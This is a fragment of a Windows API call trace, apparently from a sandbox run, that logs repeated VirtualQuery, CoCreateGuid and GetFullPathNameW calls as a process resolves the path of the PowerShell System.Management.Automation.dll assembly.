	[0379.101] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.101] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.101] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.102] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.102] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.102] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.102] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.102] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.102] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.102] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.102] VirtualQuery (in: lpAddress=0x14b6e0, lpBuffer=0x14c5a0, dwLength=0x30 | out: lpBuffer=0x14c5a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.102] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.103] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.103] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.103] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.103] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x18022738, Data2=0xa27b, Data3=0x48e7, Data4=([0]=0xbe, [1]=0x71, [2]=0x29, [3]=0x88, [4]=0x34, [5]=0xa5, [6]=0x6d, [7]=0xb5))) returned 0x0
	[0379.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.104] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xef1f8949, Data2=0x9e9, Data3=0x4ad9, Data4=([0]=0xba, [1]=0x17, [2]=0xd2, [3]=0x16, [4]=0x52, [5]=0xbc, [6]=0xef, [7]=0x5b))) returned 0x0
	[0379.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.106] VirtualQuery (in: lpAddress=0x14b110, lpBuffer=0x14bfd0, dwLength=0x30 | out: lpBuffer=0x14bfd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.107] VirtualQuery (in: lpAddress=0x14b110, lpBuffer=0x14bfd0, dwLength=0x30 | out: lpBuffer=0x14bfd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.107] VirtualQuery (in: lpAddress=0x14b1a0, lpBuffer=0x14c060, dwLength=0x30 | out: lpBuffer=0x14c060*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.107] VirtualQuery (in: lpAddress=0x14b110, lpBuffer=0x14bfd0, dwLength=0x30 | out: lpBuffer=0x14bfd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.108] VirtualQuery (in: lpAddress=0x14b1a0, lpBuffer=0x14c060, dwLength=0x30 | out: lpBuffer=0x14c060*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.108] VirtualQuery (in: lpAddress=0x14b110, lpBuffer=0x14bfd0, dwLength=0x30 | out: lpBuffer=0x14bfd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.108] VirtualQuery (in: lpAddress=0x14b1a0, lpBuffer=0x14c060, dwLength=0x30 | out: lpBuffer=0x14c060*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.109] VirtualQuery (in: lpAddress=0x14b110, lpBuffer=0x14bfd0, dwLength=0x30 | out: lpBuffer=0x14bfd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.109] VirtualQuery (in: lpAddress=0x14b1a0, lpBuffer=0x14c060, dwLength=0x30 | out: lpBuffer=0x14c060*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
